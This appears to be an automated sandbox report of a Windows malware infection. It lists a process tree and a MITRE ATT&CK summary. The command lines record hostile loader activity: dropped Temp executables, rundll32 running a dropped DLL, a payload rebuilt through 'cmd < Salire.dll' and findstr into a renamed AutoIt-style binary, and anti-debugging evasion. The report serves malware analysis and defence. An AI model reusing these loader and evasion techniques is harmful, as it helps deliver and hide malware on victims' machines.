C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2440 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:7792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6856 -ip 68561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 6796 -ip 67961⤵PID:5896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1608 -ip 16081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6164 -ip 61641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6252 -ip 62521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 7760 -ip 77601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 7772 -ip 77721⤵PID:1812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7792 -ip 77921⤵PID:4792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6844 -ip 68441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 3428 -ip 34281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6796 -ip 67961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 8268 -ip 82681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7108 -ip 71081⤵PID:4640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 8260 -ip 82601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 8164 -ip 81641⤵PID:6164
-
C:\Users\Admin\AppData\Local\Temp\D83B.exeC:\Users\Admin\AppData\Local\Temp\D83B.exe1⤵PID:4076
-
C:\Users\Admin\AppData\Local\Temp\D83B.exeC:\Users\Admin\AppData\Local\Temp\D83B.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8560
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 788 -p 7416 -ip 74161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7536
-
C:\Users\Admin\AppData\Local\Temp\EC80.exeC:\Users\Admin\AppData\Local\Temp\EC80.exe1⤵
- Suspicious use of SetThreadContext
PID:7140 -
C:\Users\Admin\AppData\Local\Temp\EC80.exeC:\Users\Admin\AppData\Local\Temp\EC80.exe2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6768
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4640
-
C:\Users\Admin\AppData\Local\Temp\15D3.exeC:\Users\Admin\AppData\Local\Temp\15D3.exe1⤵PID:6464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 2442⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7980
-
-
C:\Users\Admin\AppData\Local\Temp\1F4A.exeC:\Users\Admin\AppData\Local\Temp\1F4A.exe1⤵PID:2212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 2922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9176
-
-
C:\Users\Admin\AppData\Local\Temp\34D6.exeC:\Users\Admin\AppData\Local\Temp\34D6.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6464 -ip 64641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7524
-
C:\Users\Admin\AppData\Local\Temp\3C69.exeC:\Users\Admin\AppData\Local\Temp\3C69.exe1⤵
- Loads dropped DLL
PID:8152 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Salire.dll2⤵PID:4108
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:8708
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^tylHapYkgiyMCkkIPbHwLbDknBPwQSbrOJuaoIXarvmLdfjSeRZlIFYHCYoQxXxvJeXSyTmimfYgYRUogXYYThxoLnQpmuYuweehazMpsRLaHKIKrZBvYvDvHOiHedIa$" Sfaldavano.dll4⤵PID:1836
-
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comSai.exe.com L4⤵PID:7592
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L5⤵PID:7096
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2224 -
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L7⤵PID:6448
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L8⤵PID:1200
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L9⤵PID:6036
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L10⤵PID:5628
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L11⤵PID:8252
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L12⤵PID:9076
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L13⤵PID:9052
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L14⤵PID:8048
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L15⤵PID:1016
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L16⤵PID:8548
-
C:\Users\Admin\AppData\Roaming\Sai.exe.comC:\Users\Admin\AppData\Roaming\Sai.exe.com L17⤵PID:8880
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost4⤵
- Runs ping.exe
PID:4020
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:8928 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1e9ef60c-1877-6b4e-bb16-115b38a59815}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000164" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:8216
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000010C" "69d0"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:2216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2212 -ip 22121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵PID:7208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7372
-
C:\Users\Admin\AppData\Local\Temp\51F6.exeC:\Users\Admin\AppData\Local\Temp\51F6.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:4068
-
C:\Users\Admin\AppData\Local\Temp\561D.exeC:\Users\Admin\AppData\Local\Temp\561D.exe1⤵PID:6280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 2962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1360
-
-
C:\Users\Admin\AppData\Local\Temp\5A93.exeC:\Users\Admin\AppData\Local\Temp\5A93.exe1⤵
- Suspicious use of SetThreadContext
PID:4376 -
C:\Users\Admin\AppData\Local\Temp\5A93.exeC:\Users\Admin\AppData\Local\Temp\5A93.exe2⤵PID:3880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6280 -ip 62801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5592
-
C:\Users\Admin\AppData\Local\Temp\7521.exeC:\Users\Admin\AppData\Local\Temp\7521.exe1⤵PID:7504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2402⤵
- Program crash
- Checks processor information in registry
PID:256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 7504 -ip 75041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1104
-
C:\Users\Admin\AppData\Local\Temp\8F12.exeC:\Users\Admin\AppData\Local\Temp\8F12.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8608
-
C:\Users\Admin\AppData\Local\Temp\9925.exeC:\Users\Admin\AppData\Local\Temp\9925.exe1⤵PID:7136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3984
-
-
C:\Users\Admin\AppData\Local\Temp\A442.exeC:\Users\Admin\AppData\Local\Temp\A442.exe1⤵PID:8888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8888 -s 3122⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 7136 -ip 71361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 9020 -ip 90201⤵PID:7376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 8888 -ip 88881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7292
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:4328 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 8652 -ip 86521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5756 -ip 57561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 2372 -ip 23721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5712 -ip 57121⤵PID:2072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 9144 -ip 91441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5900 -ip 59001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 6968 -ip 69681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 7392 -ip 73921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 6352 -ip 63521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4940 -ip 49401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 2004 -ip 20041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8676
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 736 -p 5436 -ip 54361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 8592 -ip 85921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6164
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6372
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1